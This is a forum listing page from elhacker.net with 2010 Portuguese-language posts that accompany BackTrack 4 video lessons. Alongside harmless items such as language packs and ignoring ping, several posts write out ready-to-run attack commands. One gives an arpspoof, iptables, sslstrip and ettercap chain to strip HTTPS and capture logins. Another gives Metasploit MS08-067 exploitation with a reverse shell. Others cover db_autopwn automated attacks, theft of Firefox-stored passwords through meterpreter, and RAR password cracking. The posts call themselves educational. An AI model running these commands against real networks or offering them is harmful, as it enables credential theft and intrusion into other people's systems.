elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Guia Basica de como poner Back Track 4 en Español en: 9 Mayo 2010, 14:25 pm
Ola pessoal, sou Brasileiro mas vou posta essa dica.

1: Instalamos los paquetes necesarios

presionamos alt+f2 y escribimos "konsole" sin las comillas y nos aparecera la terminal donde usaremos los siguientes comando para instalar los paquetes:

Citar
# apt-get install language-pack-es


Citar
# apt-get install language-pack-es-base

Citar
# apt-get install language-pack-kde-es


Citar
# apt-get install language-pack-kde-es-base


Citar
# apt-get install language-support-es


Citar
# apt-get install language-support-translations-es


Citar
# apt-get install language-support-writing-es

Si tienes KDE 3.5.x instalar este paquete:

Citar
# apt-get install kde-i18n-es

Si tienes KDE 4.x.x instalar este paquete:

Citar
# apt-get install kde-l10n-es

Para saber que version de KDE presionando las teclas "alf+f1" y vamos al menu de backtrack "Settings/Panel Center"
Nota: el "#" significa que lo tienes que hacer como root o con "sudo".

Abraços []'
2  Seguridad Informática / Hacking / [Video aula]Instalando o nessus no Back Track 4 en: 9 Mayo 2010, 13:05 pm
Instalando o nessus no Back Track 4.

Baixar:
Citar

Assista on-line:
Citar

Abraços []'
3  Seguridad Informática / Hacking / Metasploit email collector en: 9 Mayo 2010, 13:03 pm
Listando e-mail de um domínio.

Baixar:
Citar

Assista on-line:
Citar
4  Seguridad Informática / Hacking / [Video aula] Sniffer SSL - https en: 9 Mayo 2010, 13:00 pm
Nesta video vou mostrar como criptografia SSL não e segura. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafego da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).

Programas usados:
Comando usados:
Citar
kate /etc/etter.conf
 * Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i eth0

sslstrip -a -k -f
ettercap -T -q -i eth0


OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0"

Todas os programas são encontrados no backtrack 4

Baixar:
Citar
Assista on-line:
Citar

Abraços []'
5  Seguridad Informática / Hacking / Craqueando senhas .rar com cRARk en: 9 Mayo 2010, 12:52 pm
vídeo aula mostra como quebrar senha de arquivos .rar. Vídeo simples, mostro apenas o uso básico do cRARk, Esse software utilizar recurso CUDA.

Programa usado:

cRARk

Programa pode ser usando para os SO Windows, Linux e Mac.

Manual

Instalação no BackTrack 4:
Citar
#apt-get install crark

Download:
Citar

Assista on-line:
Citar


Abraços []'
6  Seguridad Informática / Hacking / [Video aula] Metasploit - Explorando falha MS08-067 en: 9 Mayo 2010, 12:44 pm
Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.

Programas usados:
Metasploit framework 3
Nmap

Exploit usado:
Citar
ms08_067_netapi
Payload(carga)  usado:
Citar
shell_reverse_tcp

Tudo encontrado no BackTrack 4.

Solução da falha: Clique aqui

Comandos:
Citar
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit


Download:
Citar

Assista on-line:

Citar

Abraços[]
7  Seguridad Informática / Hacking / Configurando sistema operacional para não reponder a "ping" pacotes icmp en: 9 Mayo 2010, 12:42 pm
Na vídeo mostro em dois sistema operacionais, Windows e Linux.

Comando linux:
Citar
Você pode usar um editor de texto ou no shell:
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

Comandos windows:
Citar
Iniciar > Painel de controle > Central de segurança > Firewall do Windows > Avançado > Configurações > ICMP


Download:
Citar

Assista On-line:
Citar
8  Seguridad Informática / Hacking / Metasploit GUI - Explorando falha MS08-067 en: 9 Mayo 2010, 12:37 pm
Olá senhores, fiz uma video aula de penetração em um maquina usando windows XP sp2 via metasploit, para o pessoal do fórum que vem acompanhando vídeo anteriores minhas, perceberam que fiz tudo em modo texto, creio que a maioria dos usuários tem uma certa dificuldade ainda em lida com esse modo. Pensando nisso resolvi mostra em modo gráfico.

Na vídeo aula não mostrei como detectar o SO rodando no determinado host, isso pode ser feito com o nmap "nmap -O IP_alvo", para quem vem acompanhando minha vídeo ja poderão perceber isso.

Obs: Na hora de selecionar o Target (versão de sistema operacional), deixei automático, caso ele não encontre, e preciso add o sistema.

Uma coisa boa do modo gráfico e que ele nos fornece tudo organizado (Como vocês vão perceber no decore da vídeo aula), as veces e uma mão na roda... hahaha

Não vou explicar todo o processo da vídeo, caso tenha duvida assistas as anteriores.

Download:
Citar

Assista on-line:
Citar


Lembrando que as vídeo aulas são de carácter educacional!!! Apenas estudos.
9  Seguridad Informática / Hacking / [Video Aula] Metasploit & Nmap - ataque automatizado en: 9 Mayo 2010, 12:32 pm
Bom pessoal, nessa vídeo aula mostro como cria um base de dados para um ataque automatizado usando usando resultados do nmap.

A primeira coisa que eu fiz foi verificar quantos hosts estavam em minha disponível em minha rede com o comando:
Citar
nmap 10.1.1.1-100
Ele me mostra o resultado de de todas as maquinas que estão com ip 10.1.1.1, 10.1.1.2, 10.1.1.3 e assim sucessivamente ate o 10.1.1.100.

Nos mostrou 3 hosts:
1- Meu roteador D-link com 3 portas abertas
2- Minha maquina, com todas as portas fechadas :p
3- Maquina virtual usando windows XP (caso tenho duvida qual o sistema operacional rodando em um determinado IP "nmap -O IP")

Segundo passo, foi cria um banco de dados para armazenar os resultados do nmap.
Citar
db_create VITIMA (base de dados)

Terceira coisa foi verifica se tinha algum host disponível. Como vocês podem ver não tinha nenhum host predefinido.
Citar
db_hosts

Quarta coisa foi escanear o host. Acabei encontrando a porta 445 aberta (Que pode ser vulnerável)
Citar
nmap IP -p 445

Para finalizar eu executei o ataque automatizado. Então ele começou a procurar um exploit e foi injetando no host, para encontrar o exploit indicado para a vulnerabilidade da porta 445.
Citar
db_autopwn -t -p -e -s -b
No final ele me mostrou o exploit usado e ja injetado no host, já estaba dentro do sistema com um meterpreter.

Programas usando:

metasploit & nmap

Download da video:
Citar

Assista On-line:
Citar
10  Seguridad Informática / Hacking / Hack Firefox - Metasploit - exploração via meterpreter en: 9 Mayo 2010, 12:30 pm
Ola senhores, nesta aula demonstro uma invasão a um SO Windows XP com metasploit via meterpreter, visando arquivos da base do mozilla firefox onde ficam armazenados as senhas memorizadas pelo navegador.

Detalhei bem a aula, caso haja duvida reporte abaixo.

Baixar:
Citar
Programa:
Citar
Assista On-line:
Citar
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines